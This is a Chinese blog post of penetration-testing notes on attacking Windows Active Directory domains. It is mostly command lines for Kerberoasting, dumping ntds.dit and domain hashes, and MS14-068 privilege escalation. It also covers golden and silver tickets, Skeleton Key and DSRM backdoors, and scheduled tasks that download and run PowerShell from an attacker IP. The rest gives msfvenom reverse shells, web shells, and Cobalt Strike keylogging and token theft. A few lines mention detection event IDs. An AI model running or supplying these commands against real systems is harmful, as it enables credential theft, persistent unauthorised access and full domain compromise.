本地启动计算器 $com = [activator]::CreateINstance([type]::GetTypeFromProgiD("MMC20.Application",'127.0.0.1")) $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimzed")- 远程机器执行命令
net use \\192.168.100.205 "a123456" /user:pentest.com\syst1m $com = [activator]::CreateINstance([type]::GetTypeFromProgiD("MMC20.Application",'127.0.0.1")) $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimzed")SPN
SPN扫描
- SPN
spn = serviceclass "/" hostname [":"port] ["/" servicename] MSSQLSvc/computer1.pentest.com:1433 exchageMDB/EXCAS01.pentest.com Exchange服务 TERMSERV /EXAS.pentest.com rdp WSMAN/ExCAS01.pentest.com- PowerShell-Ad-Recon工具包
https://github.com/PyroTek3/PowerShell-AD-Recon 所有spn服务扫描 https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices Import-Moudle .\Discover-PSInterestingServices Discover-PSIntingService- Windows自带
setspn -T domain -q */*Kerberoast
- 手动注册SPN
setspn -A MSSQLSvc/computer1.pentest.com:1433 mssql- 查看用户所对应的SPN
setspn -L pentest.com\mssql- 查看所有注册的SPN
setspn -T domain -q */*- adsiedit.msc查看用户spn以及其他高级属性
-
配置指定服务的登陆权限
gpedit.msc\Computer Configuration\Windows Settings\Security Settings\Local Policies\User Pights Assignment\Log on as a service- 修改加密类型
gpedit.msc\Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Network security; Configure encryption types allowed- 请求SPN Kerberos票据
Add-Type -AssmblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestor SecurityToken-ArgumentList "MSSQLSvc/computer1.pentest.com"- 导出票据
kerberos::list /export- 破解hash
https://github.com/nidem/kerberoast python tgsrepcrack.py wordlist.txt mssql.kirbiExchange邮件服务器
- Exchange邮件服务器
邮箱服务器(Mailbox Server) 托管邮箱、公共文件夹及相关消息数据 客户端访问服务器(Client Acess Server) 接收处理不同客户端请求 集线传输服务器(Hub Transport Server) 进出站规则、处理邮件正确分发,确保地址正确解析 统一消息服务器(Unified Messagine Server) 允许用户通过邮件发送存储语音和传真 边缘传输服务器(Edge Transport Server) 路由发往内/外部的邮件、反垃圾邮件、反病毒策略- 访问接口
OWa(web邮箱) domain/owa/ EAC(echange管理中心) http://domain/ecp/ Outlook Anywhere MAPI Exchange ActiveSyne Exchange Web ServiceExchange服务发现
- 基于端口扫描
nmap -A -O -av 192.168.100.190- SPN查询
setspn -T pentest.com -F -Q */*Exchange基本操作
- 查看邮件数据库
powershell add-pssnapin microsoft.exchange* 添加exchange管理单元 Get-MailboxDatabase -server "Exchange" 查询指定数据库 Get-MailboxDatabase -Identity 'Mailbox Database 1894576043' | Format-List Name,EdbFilePath,LogFolderPath- 获取现有用户的邮件地址
Get-Mailbox | format-tables Name,WindowsEmailAddress- 查看指定用户的邮箱使用信息
get-mailboxstatistics -identity administrator | Select DisplayName,ItemCount,TotailItemSize,LastLogonTime- 获取用户邮箱中的邮件数量以及最后登陆时间
Get-Mailbox -ResultSize Unlimited | Get-MailboxStatistics | Sort-Object TotalItemSize -Descend导出指定的电子邮件
后缀为pst
- 配置用户的导入/导出权限
(1)查看用户权限 Get-ManagementRoleAssignment -role "Mailbox import Export" | Format-List RoleAssigneeName (2)添加权限 New-ManagementRoleAssignment -Name "Import Export_Domain Admins" -User "Administrator" -Role "Mailbox import Export" (3)删除权限 Remove-ManagementRoleAssignment "Import Export_Domain Admins" -Confirm:$false- 设置网络共享文件夹
UNC(通用命名规范) ner share inetpub=c:\inetpub /grant:everyone,full- 导出用户电子邮件
(1)powershell导出 New-MailboxExportRequest -Mailbox administrator -FilePath \\192.xxx.xxx.xxx\inetpub\administrator.pst (2)图形化导出 192.168.100.194\ccp- 管理导出请求
(1)查看之前产生的导出请求记录 Get-MailboxExportRequest (2)将指定用户已完成导出请求删除 Remove-MailboxExportRequest -Identity Administrtor\mailboxexport (3)删除所有导出记录 Get-MailboxExportRequest -Status Completed Remove-MailboxExportRequest域控制器安全
使用卷影拷贝服务器提取ntds.dit
- ntds.dit
存储用户名、散列值、组、GPP、Ou等数据库- 通过ntdsutil.exe提取ntds.dit
为活动目录提供管理机制的命令行工具 适用于03、08、12(1)创建快照 ntdsutil snapshot "activate instance ntda" create quit quit (2)加载快照 ntdsutil snapshot" mount {GUID} "quit quit (3)复制快照到本地 copy c:\$xxx\ntds.dit c:\temp\ntds.dit (4)删除之前加载的快照 ntdsutil snapshot "unmount {GUID}" "delect {GID}" quit quit (5)查看快照 ntdsutil snapshot "List All" quit quit- 利用vssadmin提取ntds.dit
创建和删除卷影拷贝、列出卷影拷贝信息 适用于08、win7创建c盘卷影拷贝 vssadmin create shadow /for=c: 复制卷影拷贝 copy ntds.dit c:\ntds.dit 删除快照 vssadmin delect shadow /for=c: /quiet- 利用vssown.vbs提取
下载地址 https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbscscript vssown.vbs /start 启动 cscript vssown.vbs /create c 创建 cscript vssown.vbs /list 列出 cscript vssown.vbs /delect- 使用ntdsutil的IFM(媒体创建)创建卷影拷贝
Nishang Copy-VSS.ps1 脚本 import-moudle .\Copy-VSS.ps1 Copy-vss- 使用diskshadow导出ntds.dit(必须在c:\windows\system32中操作)
diskshadow.exe /? 查看帮助 将需要执行的命令导入command.txt文件 diskshadow.exe /s c:\command.txt 执行命令导出ntds.dit的txt //设置卷影拷贝 set context persistent nowriters //添加卷 add volume c: alias someAlias //创建快照 create //分配虚拟磁盘盘符 expose %someAlias% k: //将ntds.dit复制到c盘 exec "cmd.exe" /c copy k:\windows\NTDS\ntds.dit c:\ntds.dit //删除所有快照 delect shadow all //列出系统中的卷影拷贝 list shadow all //重置 reset //退出 exit diskshadow /s c:\command.txt 导出system.hive reg save hkim\system c:\windows\temp\system.hive- 监控卷影拷贝服务的使用情况
system event id 7036导出ntds.dit 中的散列值
使用esedbexport 恢复ntds.dit
- 下载地址
https://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar- 导出netd.dit
apt-get install autoconf automake autopoint libtool pkg-config ./configure make sudo make install sudo ldconfig /usr/local/bin- 使用
esedbexport -m tables ntds.dit 提取表信息- 导出散列值
下载ntdsxtract https://github.com/csababarta/ntdsxtract.git python setup.py build && python setup.py install 安装ntdsxtract 将netds.dit.export 和sustem文件夹放入ntdsxtract文件夹 dsuser.py ntds.dit.export/database.3 ntds.dit.export/link_table.5 output --syshive SYSTEM --passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout | tee all_user.txt 将所有散列值导出到all_user.txt dscomputers.py ntds.dit.export/database.3 computer_output --csvoutfile all_computers.csv 导出域内所有计算机的信息impacket工具包导出散列值(secretsdump)
https://github.com/csababarta/ntdsxtract.git python setup.py install impacket-secretsdump -system SYSTEM -ntds ntds.dll LOCAL 导出所有散列值 impacket-secretsdump -hashs aad3bxxxxx -just-dc pentest.com/[email protected] 从远程域控制器中读取散列值- 在windows下解析ntds.dit 导出域账号和散列值
https://github.com/zcgonvh/NTDSDumpEx/releases/download/v0.3/NTDSDumpEx.zip NTDSDumpEx.exe -d ntds.dit -s system利用dcsync获取域散列值
- 使用mimikatz转储域散列值(域管)
lsadump::dcsync /domain:pentest.com /all /csv 所有用户名的散列值 lsadump::dcsync /domain:pentest.com /user:syst1m 导出指定用户的散列值 privilege::debug lsadump::lsa /inject 域控上转储lsass.exe dump散列值- 使用dcsync获取域账户和域散列值
https://gist.github.com/monoxgas/9d238accd969550136db Invoke-DCSync -PWDumpFormat使用measploit获取域散列值
- osexec_ntdsgrab
use auxiliary/admin/smb/psexec_ntdsgeab RHOST、SMBDOMAIN、SMBUser、SMBPass参数- 基于meterprter会话获取域账号和散列值
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.xxx.xxx.xxx LPORT = 5555 -f exe > s.exe use windows/gather/credentials/domain_hashdump使用vshadow.exe和QuarksPwDump.exe导出域账号和散列值
- 下载地址
https://github.com/quarkslab/quarkspwdump ShadowCopy.vbs setlocal if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK set SOURCE_DRIVE_LETTER=%SystemDrive% set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit set DESTINATION_PATH=%~dp0 @echo ...Determine the scripts to be executed/generated... set CALLBACK_SCRIPT=%~dpnx0 set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd @echo ...Creating the shadow copy... "%~dp0vshadow.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER% del /f %TEMP_GENERATED_SCRIPT% @goto :EOF :IS_CALLBACK setlocal @echo ...Obtaining the shadow copy device name... call %TEMP_GENERATED_SCRIPT% @echo ...Copying from the shadow copy to the destination path... copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH% esentutl /p /o ntds.dit 修复复制出来的ntds.dit vshadows.exeKerberos域用户提权
PyKEK工具包
- 下载地址
https://github.com/mubix/pykek- 工具
-u 用户名@域名 -s 用户sid -d 域控制器地址 -p 明文密码 --rc4 在没明文密码情况下,通过NTLM Hash登陆- 使用
wmic qfe get botfixid 查看补丁情况 whoami /user 查看用户SID wmic useraccount get name,sid 获取域内所有用户的SID ms14-068.exe -u 域成员名@域名 -s SID -d 域控制器地址 -p 域成员密码 清除票据 kerberos::purge kerberos::ptc "[email protected]" 注入票据goldenPac.py
- 命令格式
python goldenPac.py 域名/域成员用户:密码@域控制器地址- 安装kerberos客户端
apt-get install krb5-user yMetasploit
- 利用脚本
use auaxiliary/admin/kerberos/ms14_068_kerberos_checksum- 格式转换,导出kirbi格式文件
kerberos::clist "a.bin" /export- 生成反向shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST LPORT -f exe >shell.exe- 票据注入
use exploit/mulit/reverse_tcp load wiki kerberos_ticket_use a.kirbi- 高权限票据测试
use/exploit/windows/local/current_user_psexec权限维持及防御
操作系统后门
粘滞键后门
- 替换
cd windows\system32 Move sethc.exe sethc.exe.bak copy cmd.exe sethc.exe- Empire
usemoudle lateral_movement/invoke_wmi_debuggerinfo set List shuteet set ComputerName WIN7-64.shuteer.testlab set TargetBinary sethc.exe execute注册表注入后门
- Empire
usemoudle persistence/userland/registry set Listener shuteer set RegPath HKCU:Spftware\Microsoft\Windows\CurrentVersion\Run execute计划任务后门
- Metasploit 模拟计划任务后门
use exploit/multi/script/web_delivery (1)用户登陆 schtacks /create /tn WindowsUpdate /tr "c:\windows\system32\powershell.exe -WindowsStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://192.xxx.xxx.xxx'")'" /sc onlogon /ru system (2)系统启动 schtacks /create /tn WindowsUpdate /tr "c:\windows\system32\powershell.exe -WindowsStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://192.xxx.xxx.xxx'")'" /sc onstart /ru system (3)系统空闲 schtacks /create /tn WindowsUpdate /tr "c:\windows\system32\powershell.exe -WindowsStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://192.xxx.xxx.xxx'")'" /sc onidle /i l- PowerSploit模拟生成后门
https://github.com/PowerShellMafia/PowerSploit/blob/master/Persistence/Persistence.psm1 创建后门。空闲状态下执行 shuteer.ps1为要执行的payload Import-Moudle ./Persistence.psm1 $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle $ UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle Add-Persistence -FilePath ./shuteer.ps1 -ElevatedPersistenceOption $ElevatedOptions - UserPersistenceOption $UserOptions -Verbose- Empire模拟后门
usemoudle persistence/elevated/schtasks set DailyTime 16:17 set Listener test execute- meterpreter后门
Persistence- Cymothoa后门
Cymothoa- WMI后门(管理员)
Empire Invoke-WMl模块 powershell/persistence/elevated/wmi 检查目标主机情况: Get-WMIObject -Namespace root\Subscription -Class CommandLine EventConsumer -Fifter "Name='Update'" 修复: 删除自动运行的恶意wmi条目 使用Get-WMIObject命令删除持久化相关组件WEB后门
- Nishang
nishang\Antak-WebShell目录下- Weevely
https://github.com/epinna/weevely3weevely 查看帮助 weevely <URl> <password> [cmd] 连接木马 weevely session <path>[cmd] 加载会话 weevely generate <password><path> 生成后门代理 weevely http://xxx.xxx.xxx.xxx/test.php test system_info 系统信息 net_scan扫描端口 help 查看命令- webacoo后门
webacoo -h 查看帮助 webacoo -g -o /root/test.php 生成webshell webacoo -t -u http://xxxtest/php load 查看模块- ASPX meterpreter
shell_reverse_tcp payload- PHP meterpreter
php meterpreter payload域控制器权限持久化
DSRM域后门
- DSRM
目录服务恢复模式 使用DSRM账号恢复 03不使用 08需要安装KB961320补丁 08以后不需要- 使用
mimikatz 获取krbtgt NTLM HASH privilege::debug lasdump::lsa /patch /name:krbtgt 获取DSRM账号的NTLM Hash token:elevate lsadump:sam 将DSRM账号和krbtgt的ntlm hash同步 NTDSUTIL SET DSRM PASSWORD SYNC FROM DOMAIN account krbtgt 查看是否同步成功 lsadump::sam 修改DSRM登陆方式 新建HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior为2 使用powershell更改 New-ItemProperty "hkim:system\currentrolset\control\lsa\" -name "dsemadminlogonbehavior" -value 2 -propertyType DWORD 使用dsrmz账号通过网络远程登陆域控制器 privilege::debug sekurlsa:pth /domain:DC /user:administrator /ntlm:53ebxxxx dcysnc转储krbtgt ntlm hash lsadump::dcsync /domain:pentest.com /dc:dc /user:krbtgt 防御: 检查注册表 修改dsrm账号 经常检测ID为4794的日志- DerbyCON
比DSRM更为高级的一种方式,知道hash Mimikatz “privilege::debug” “sekurlsa::pth /domain:ADSDC03 /user:Administrator /ntlm:7c08d63a2f48f045971bc2236ed3f3ac” exitSSP
https://syst1m.com/post/security-support-provider/SID History域后门
- SID History
使A域中的syst1m用户的权限当syst1m用户迁移到B域中时还拥有原来的权限- 查看test用户的SID history属性
Import-Moudle activedirectory Get-ADUser test -Properties sidhistory- 注入sid属性
privilege::debug sid::add /sam:test /new:administrator- 再次查看sid history
Get-ADUser test -Properties sidhistory.memberof- 测试
dir \\dc\c$- 防御
查看域用户sid为500的用户 完成迁移后,对相同500检测 定期检查id为4765和4766的日志、ID为4765为sid history属性添加到用户的日志。4766为将sid history属性添加到用户失败的日志Golden Ticket(黄金票据)
- 环境
域控:192.168.100.205 域成员:192.168.100.146- 导出krbtgt的ntlm hash
lsadump::dcsync /domain:pentest.com /user:krbtgt- 获取基本信息
获取sid wmic useraccount get name,sid 获取当前用户sid whoami /user 查询域管理员账号 net group "domain admins" /domain 查询域名 ipconfig /all- 实验
清空票据 kerberos::purge 生成票据 kerberos:golden /admin:Administrator /domain:pentest.com /sid:域SID /krbtgt:ntml hash /ticket:Administrator.kiribi 注入内存 kerberos::ptt Administrator.kiribi 检索当前会话中的票据 kerberos::tgt 验证权限 cscript wmiexec.vbs /shell dcSilver Ticket(白银票据)
- 收集
域名 域SID 目标服务器的FQDN 可利用的服务 服务账号的NTLM Hash 需要伪造的用户名- 实验
获取服务账号ntlm hash mimikatz log "privilege::debug" "sekurlsa::logonpasswords" 清除票据 klist purge 伪造白银票据 kerberos::golden /domain:pentest.com /sid:域SID /target:dc.pentest.com /serviceLcifs /rc4:ntlm hash /user:syst1m /ptt- 伪造LDAP 票据
Skeleton Key(万能密码)
- 使用域管账号密码连接
net use \\192.168.100.205\ipc$ "password" /user:pentest\administrator- 添加万能密码
privilege::debug misc::skeleton 注入万能密码- 验证
删除原有ipc连接 net use net usr \\dc\ipc$ /del /y 使用万能密码连接 net use \\dc\ipc$ "mimikatz" /user:administrator- Empire 中的Skeleton key
interact 进入agent usemoudle persistence/misc/skeleton key* 加载模块 execute 执行模块Hook PasswordChangeNotify
- Hook PasswordChangeNotify
Hook PasswordChangeNotify作用是当用户修改密码后在系统中进行同步,密码符合要求的话,LSA会调用PasswordChangeNotify同步密码- 使用
Import-Moudle .\Invoke-ReflectivePEInjection.ps1 注入HookPasswordChange.dll到内存 Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass 当被修改密码查看 type c:\windows\Temp\passwords.txtNishang下的脚本后门
- HTTP-Backdoor脚本
可以下载和执行powershell脚本,接收第三方网站的执行,内存执行PowerShell脚本CheckURL 给出一个URL地址,如果存在我们MagicString中的值就去执行Payload - 下载运行我们的脚本 PayloadURL 这个参数给出我们需要下载的Powershell脚本的地址 Arguments 这个参数指定我们要执行的函数 StopString 这个参数也会去看是否存在我们CheckURL返回的字符串,如果存在就会停止执行 PS > HTTP-Backdoor -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -MagicString start123 -StopString stopthis- Add-ScrnSaveBackdoor
可以帮助攻击者利用windows屏幕保护来安插一个隐藏后门- Execute-OnTime
用于在目标机器上指定powershell 脚本的执行时间- Invoke-ADSBackdoor
能够在NTFS数据流中留下一个永久性的后门,只有dir /a /r 才可以看到。 Invoke-ADSBackdoor -PayloadURL http://a.com/test.ps1Cobalt Strike
- 功能
agscript 拓展应用脚本 c2lint 用于检查profile错误和异常 teamserver 团队服务器程序 cobaltsteike.jar 客户端 logs 日志 update.jar 更新 data 保存当前teamserver 一些数据Cs模块
Cobalt strike模块
后渗透模块
- 使用Elevate模块提升Beacon权限
右键->Acceess->Elevate 内置三个模块 (1)ms14-058 普通用户->sustem权限 (2)uac-dll bypassuac (3)uac-token-duplication bypassuac elevate uac-dll test elevate uac-token-duplication test- Gold Ticket提升域管权限
access->Goldeb Ticket 查看用户所属的组 net user test /domain- make_token模拟指定用户
access->Make_token- Dump Hashes导出散列值
access->dump hashes 命令行:hashdump- logonpasswords模块
access->Run mimikatz 命令行:logonpasswords- 查看导出的信息
View->Crededtials- mimikatz模块
mimikatz [moudle:command] <args>- PsExec模块
Login->Psexec- SOCKS Server模块
Pivoting->SOCKS Server###CS常用命令
- 基本命令
help 帮助 sleep 设置休眠时间- 常用操作命令
getuid 哪个用户身份运行 getsystem 尝试获取system权限 getprivs 获取当前beacon包含的的所有权限 Explore->Browser Pivot browserpivot [pid] [x86]x64] browserpivot stop 劫持IE浏览器- 文件管理
图形化: Explore->File Browser 命令行: cd ls mkdir delect mv execute 执行文件- net view 命令
图形化: Explore->Net view 命令行: net view 显示域、资源列表 net computer 查询域控制器上的计算机账户列表查找目标 net dclist 列出域控制器 net domain_trusts 列出域信息列表 net group 枚举自身所在域控制器中的组 net localgroup 枚举当前系统的本地组 net logons 列出登陆的用户 net session 列出会话 net share 列出共享的目录和文件 net user 列出用户 net time 显示时间- 端口扫描
Explore->Port scan- 进程列表模块
Explore->Process List 命令行: ps kill [pid]- screenshot
图形: Explore->screenshot 命令行: screenshot screenshots pid s 定时截图- Log Keystrokes模块(键盘记录)
图形: Process List->Log KeyStrokes 命令行: keylogger [pid] view->Log Keystrokes 查看键盘记录- Inject 命令(注入新进程)
图形化: Process List->Inject Becaon: inject [pid]- Steat Token模块
图形化: Process List->Steal token Becaon: steat_token [pid]- Note模块
图形化: session->note Becaon: note [text]- shell
shell command arg- run
run 程序 参数- execute(通常无回显)
execute 程序 参数- powershell
powershell command arg- powerpick(可以不通过调用powershell.exe 执行命令)
powerpick commandlet arg- powershell-import (可以直接本地powershell脚本加载到目标系统的内存中)
powershell-import /root/desktop/powerview.ps1 powershell Get-HostIPAggressor脚本
加载脚本
- 永久加载
load按钮-> xxx.cna- 客户端加载
./agscript [host] [port][user][password][/path/to/script.cna]> 笔记摘自:《内网安全攻防 渗透测试实战指南》
原创文章,作者:syst1m,未经授权禁止转载!如若转载,请联系作者:syst1m
赞 (1)
syst1m 
微信扫一扫 
支付宝扫一扫
域维权- Security Support Provider
« 上一篇
2020年2月24日 pm12:17
C# shellcode loader
下一篇 »
2020年2月26日 am12:03
